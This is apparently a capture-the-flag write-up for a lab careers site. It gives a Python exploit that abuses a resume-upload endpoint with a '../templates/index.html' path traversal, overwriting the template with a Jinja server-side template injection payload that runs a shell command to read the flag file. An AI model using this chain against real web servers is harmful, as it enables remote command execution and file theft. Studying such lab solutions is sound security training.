# Careers

**IPAddress** 172.20.0.3\
**Port** 80\
**URL** <http://172.20.0.3/>

## Description

Find and apply to career opportunities at TCC.

## Structure

```bash
.
├── app
│   ├── __init__.py
│   ├── routes.py
│   ├── static
│   │   └── assets
│   │       ├── css
│   │       │   └── careers.css
│   │       ├── img
│   │       │   └── construction.jpg
│   │       └── js
│   ├── templates
│   │   ├── includes
│   │   │   ├── footer.html
│   │   │   ├── header.html
│   │   │   └── scripts.html
│   │   ├── index.html
│   │   └── layouts
│   │       └── base.html
│   ├── uploads
│   └── views.py
├── flag.txt
└── run.py
10 directories, 12 files
```

## Solution

#### Install pip for python

```bash
sudo apt install python3-pip
```

#### Install requests for the exploit

```bash
python3 -m pip install requests
```

#### Exploit

```python
from requests import post, get

filename = '../templates/index.html' # the index.html template path to overwrite

payload = b'{{ cycler.__init__.__globals__.os.popen(\'cat /usr/src/app/flag.txt\').read() }}' # https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection
files = {'file': (filename, payload, 'text/html')}

url = 'http://172.20.0.3/'
endpoint = '/api/v1/upload/resume'

response = post(url + endpoint, files = files)

response = get(url)
print(f'Flag: {response.text}')
```

#### Flag

```bash
└─$ python3 exploit.py 
```

```
Flag: TCC{34$Y_USE_SECURE_FILENAME}
```

### Explanation

* [What is server-side template injection?](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#what-is-server-side-template-injection)
* [Server-side template injection payloads](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection)
* [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal)
* [Unrestricted File Upload](https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload)